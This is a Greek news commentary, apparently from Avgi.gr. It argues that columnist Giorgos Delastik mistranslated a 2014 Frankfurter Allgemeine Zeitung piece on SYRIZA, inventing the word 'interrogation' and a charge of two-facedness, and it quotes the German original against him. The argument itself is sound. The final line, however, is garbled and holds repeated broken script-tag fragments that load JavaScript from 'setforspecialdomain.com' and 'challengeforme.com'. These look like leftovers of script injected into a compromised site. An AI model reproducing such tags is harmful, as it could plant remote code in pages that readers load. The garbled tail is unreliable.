Άραγε οι Γερμανοί… ανακρίνουν τον ΣΥΡΙΖΑ;

4Άραγε οι Γερμανοί... ανακρίνουν τον ΣΥΡΙΖΑ;

Στη στήλη του στο Έθνος της 30ης Οκτωβρίου, ο Γιώργος Δελαστίκ, σε άρθρο με τίτλο «Προετοιμάζονται για πρωθυπουργία Τσίπρα πλέον στο Βερολίνο»,1 παραθέτει εκτενή αποσπάσματα από ένα δημοσίευμα της γερμανικής εφημερίδας Frankfurter Allgemeine Zeitung (FAZ) της 27ης Οκτωβρίου, το οποίο αναφέρεται στον ΣΥΡΙΖΑ και τον πρόεδρό του και υπογράφεται από τον Γερμανό δημοσιογράφο Michael Martens.2 Μία εβδομάδα μετά, ο ίδιος δημοσιογράφος, από τα Επίκαιρα αυτή τη φορά (τ. 262, 06/11-12/11/2014), επανέρχεται στο ίδιο ζήτημα σε άρθρο του με τίτλο «Ως και οι Γερμανοί ετοιμάζονται για κυβέρνηση Τσίπρα».3

Σχολιάζοντας το γερμανικό δημοσίευμα από τις σελίδες του Έθνους, ο κ. Δελαστίκ, ανάμεσα σε άλλα, γράφει: «Δύο τουλάχιστον πράγματα έχουν σημασία στα ελάχιστα σημεία της ανάλυσης που αναφέραμε μέχρι στιγμής. Πρώτον, η σκληρότητα της γλώσσας: δύο φορές χρησιμοποιεί η εφημερίδα τη λέξη “ανάκριση” για τα στελέχη του ΣΥΡΙΖΑ! Δεύτερον, τους εμφανίζει διπρόσωπους τους ανθρώπους του ΣΥΡΙΖΑ συμπεριλαμβανομένου του αρχηγού τους: “πραγματιστές” στις συζητήσεις με τους Γερμανούς, όπου υποτίθεται ότι λένε πράγματα διαφορετικά από τις δηλώσεις τους που απευθύνονται στην ελληνική κοινή γνώμη».

Στο ίδιο μοτίβο, στα Επίκαιρα, ο Γιώργος Δελαστίκ γράφει: «Σοκάρει σίγουρα τους Έλληνες αναγνώστες η ωμότητα της γλώσσας του Γερμανού αρθρογράφου. Χρησιμοποιεί δύο φορές τη λέξη “ανάκριση” (!) για τις συζητήσεις Γερμανών με τον Αλέξη Τσίπρα και τα στελέχη του ΣΥΡΙΖΑ –με τους Έλληνες, φυσικά, στη θέση των ανακρινόμενων στα κεντρικά της… Γκεστάπο!»

Η όποια ένσταση σε σχέση με τα παραπάνω δεν αφορά τις ερμηνείες, τις απόψεις ή και τις θέσεις του κ. Δελαστίκ, τις οποίες ασφαλώς έχει κάθε δικαίωμα να διατηρεί, αλλά την ανακρίβεια των πραγματολογικών δεδομένων στα οποία βασίζεται για να οικοδομήσει την επιχειρηματολογία του. Συγκεκριμένα:

α) Αποδίδοντας το ρεπορτάζ της γερμανικής εφημερίδας στα ελληνικά, ο κ. Δελαστίκ διατείνεται ότι ο Γερμανός δημοσιογράφος γράφει: «Εσχάτως ήταν για ανάκριση μια αντιπροσωπεία πολιτικών του ΣΥΡΙΖΑ για συζητήσεις στα υπουργεία Οικονομικών και Οικονομίας στο Βερολίνο […] Μετά την ανάκριση φαίνονται ο Τσίπρας και οι άνθρωποί του στην προσωπική συζήτηση πιο πραγματιστές από όσο στις δηλώσεις τους που έχουν κατά νου την κοινή γνώμη». Μια ματιά στο πρωτότυπο ωστόσο αρκεί για να διαπιστώσουμε ότι κάτι τέτοιο δεν ισχύει. Σε αντίθεση με όσα αναληθώς ισχυρίζεται ο συνεργάτης σας, οικοδομώντας μάλιστα επ’ αυτών ολόκληρο «επιχείρημα», η επίμαχη λέξη «ανάκριση» δεν απαντάται πουθενά στο πρωτότυπο. Ο Michael Martens στην πραγματικότητα γράφει: «Σύμφωνα με όσα πληροφορούμαστε, πρόσφατα βρέθηκε στο Βερολίνο αντιπροσωπεία πολιτικών του ΣΥΡΙΖΑ για συζητήσεις στα υπουργεία Οικονομικών και Οικονομίας […] Απ’ ό,τι μαθαίνουμε, στις κατ’ ιδίαν συνομιλίες τους ο Τσίπρας και οι άνθρωποί του ακούγονται πιο πραγματιστές απ’ όσο στις δηλώσεις τους που απευθύνονται προς τα έξω».

β) Ενώ λοιπόν ο κ. Δελαστίκ υποστηρίζει ότι η FAZ «εμφανίζει διπρόσωπους τους ανθρώπους του ΣΥΡΙΖΑ συμπεριλαμβανομένου του αρχηγού τους», η εκτίμηση αυτή ανήκει στην πραγματικότητα αποκλειστικά και μόνο στον ίδιο, καθώς ούτε η ως άνω επίμαχη φράση ούτε οποιοδήποτε άλλο σημείο του δημοσιεύματος της γερμανικής εφημερίδας δικαιολογεί το χαρακτηρισμό «διπρόσωπος» για τα στελέχη και τον πρόεδρο του ΣΥΡΙΖΑ.

Η αυστηρή κριτική μέχρι και η πλέον σκληρή πολεμική είναι πρακτικές καλοδεχούμενες απ’ όπου κι αν προέρχονται, αρκεί να τηρούνται οι προϋποθέσεις της εγκυρότητας, της αξιοπιστίας και της ακριβολογίας. Στη συγκεκριμένη περίπτωση φαίνεται ότι και οι τρεις αυτές αρχές υπήρξαν θύματα είτε της μη ικανοποιητικής απόδοσης –από τα γερμανικά στα ελληνικά– του πρωτότυπου κειμένου είτε οποιασδήποτε άλλης σκοπιμότητας. Το πρώτο θα προκαλούσε λύπη, το δεύτερο απογοήτευση.

Αυγή.gr___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >